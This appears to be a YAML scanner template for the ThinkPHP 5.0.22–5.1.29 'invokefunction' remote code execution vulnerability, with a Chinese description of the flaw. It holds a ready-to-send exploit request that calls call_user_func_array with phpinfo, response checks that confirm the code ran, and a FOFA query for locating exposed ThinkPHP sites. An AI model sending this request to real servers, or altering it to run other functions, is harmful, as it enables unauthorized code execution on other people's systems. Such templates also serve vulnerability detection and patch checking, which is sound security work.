product: ThinkPHP
vName: ThinkPHP 5.0.22-5.1.29 invokefunction远程代码执行
type: 代码执行
vID: []
level: 3
vDesc: ThinkPHP 是一款运用极广的 PHP 开发框架。其版本 5 中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。
version: 5.0<thinkphp<=5.0.22,5.1<thinkphp<=5.1.29
note: ''
search:
  FOFA: app="ThinkPHP"
protocol: http
link: https://bbs.huaweicloud.com/blogs/403466
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - PHP Version
              - Build Date
              - System
            logic: and